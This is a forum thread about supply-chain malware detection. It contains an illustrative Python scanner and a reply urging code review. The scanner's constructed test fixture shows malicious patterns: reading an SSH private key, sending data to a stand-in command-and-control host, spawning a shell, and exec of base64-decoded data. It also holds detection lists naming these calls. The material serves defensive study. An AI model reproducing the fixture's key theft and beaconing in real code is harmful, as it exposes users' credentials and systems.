ashishbijlani 11 hours ago

Plug: I've been building a tool to detect software supply-chain cyberattacks: https://github.com/ossillate-inc/packj

Packj uses static+dynamic code/behavioral analysis to scan for indicators of compromise (e.g., spawning of shell, use of SSH keys, network communication, use of decode+eval, etc). It also checks for several metadata attributes to detect impersonating packages (typo squatting).
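
A toy version of the static half of the checks described above, added here as an illustration and not Packj's own code: an `ast`-based scanner that resolves import aliases, flags shell spawning, network calls, SSH-key paths and decode-then-eval chains, plus an edit-distance typosquat check against a short list of popular names. The sample package source, the indicator tables and the popular-name list are all constructed for the example.

```python
import ast
from typing import Dict, List, Set

# Constructed sample: a fake package __init__.py that exhibits each indicator.
SAMPLE_SOURCE = '''
import base64
import os
import subprocess as sp
from urllib import request

def _boot():
    blob = base64.b64decode("cHJpbnQoJ2hpJyk=")
    exec(blob)

def _keys():
    return open(os.path.expanduser("~/.ssh/id_rsa")).read()

def _beacon(data):
    request.urlopen("http://example.invalid/c2", data=data)

def _shell():
    sp.Popen("/bin/sh -c id", shell=True)
'''

# Indicator tables (illustrative, not exhaustive): fully qualified call names.
SHELL_CALLS = {"os.system", "os.popen", "os.execv", "os.execvp", "subprocess.Popen",
               "subprocess.run", "subprocess.call", "subprocess.check_output"}
NETWORK_CALLS = {"socket.socket", "socket.create_connection", "urllib.request.urlopen",
                 "requests.get", "requests.post", "http.client.HTTPConnection"}
DECODE_CALLS = {"base64.b64decode", "base64.b32decode", "zlib.decompress",
                "codecs.decode", "bytes.fromhex"}
EVAL_CALLS = {"eval", "exec", "compile"}
SSH_MARKERS = (".ssh/", "id_rsa", "id_ed25519")


class IocVisitor(ast.NodeVisitor):
    """Walks a module, resolving `import x as y` aliases so sp.Popen == subprocess.Popen."""

    def __init__(self) -> None:
        self.aliases: Dict[str, str] = {}      # local name -> imported dotted name
        self.decoded_names: Set[str] = set()   # variables assigned from a decode call
        self.findings: List[str] = []          # "kind:detail:line"

    def visit_Import(self, node: ast.Import) -> None:
        for a in node.names:
            top = a.name.split(".")[0]
            self.aliases[a.asname or top] = a.name if a.asname else top

    def visit_ImportFrom(self, node: ast.ImportFrom) -> None:
        if node.module:
            for a in node.names:
                self.aliases[a.asname or a.name] = f"{node.module}.{a.name}"

    def qualname(self, node: ast.AST) -> str:
        """Turn a call target (Name or Attribute chain) into an import-qualified name."""
        parts = []
        while isinstance(node, ast.Attribute):
            parts.append(node.attr)
            node = node.value
        if not isinstance(node, ast.Name):
            return ""
        parts.append(self.aliases.get(node.id, node.id))
        return ".".join(reversed(parts))

    def visit_Assign(self, node: ast.Assign) -> None:
        # Flow-insensitive: remember names bound to a decode result anywhere in the module.
        if isinstance(node.value, ast.Call) and self.qualname(node.value.func) in DECODE_CALLS:
            self.decoded_names.update(t.id for t in node.targets if isinstance(t, ast.Name))
        self.generic_visit(node)

    def visit_Call(self, node: ast.Call) -> None:
        name = self.qualname(node.func)
        if name in SHELL_CALLS:
            self.findings.append(f"shell-spawn:{name}:{node.lineno}")
        elif name in NETWORK_CALLS:
            self.findings.append(f"network:{name}:{node.lineno}")
        elif name in EVAL_CALLS and node.args:
            arg = node.args[0]
            decoded = (isinstance(arg, ast.Name) and arg.id in self.decoded_names) or \
                      (isinstance(arg, ast.Call) and self.qualname(arg.func) in DECODE_CALLS)
            if decoded:
                self.findings.append(f"decode-eval:{name}:{node.lineno}")
        self.generic_visit(node)

    def visit_Constant(self, node: ast.Constant) -> None:
        if isinstance(node.value, str) and any(m in node.value for m in SSH_MARKERS):
            self.findings.append(f"ssh-key-access:{node.value}:{node.lineno}")


def scan_source(source: str) -> List[str]:
    """Return the list of indicator findings for one module's source text."""
    visitor = IocVisitor()
    visitor.visit(ast.parse(source))
    return visitor.findings


# Metadata side: flag package names within a couple of edits of a popular name.
POPULAR = ["requests", "numpy", "urllib3", "setuptools", "boto3"]  # constructed list


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance (Wagner-Fischer, one row at a time)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(name: str, popular=POPULAR, max_dist: int = 2) -> List[str]:
    """Popular names that `name` is suspiciously close to (but not equal to)."""
    return [p for p in popular if p != name and edit_distance(name.lower(), p) <= max_dist]


if __name__ == "__main__":
    for f in scan_source(SAMPLE_SOURCE):
        print(f)
    print("typosquat candidates for 'requets':", typosquat_candidates("requets"))
```

The alias resolution is what makes `sp.Popen` and `request.urlopen` match their canonical names; without it a scanner is trivially bypassed by renaming an import. The check is still purely syntactic: a call reached through `getattr(__import__("os"), "sys" + "tem")`, or a decode routine the package defines itself, produces no finding, which is why a static pass like this is only a first filter rather than a verdict.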

lrvick 9 hours ago | parent [-]

Every decent malware author just adds tools like these to their test suites, and only releases new malware that evades all detection.

That game of cat and mouse never ends.

The only solution is just actually reviewing the code we ship to our customers. Yes, even the code we copied off the internet with a magic "npm install" command.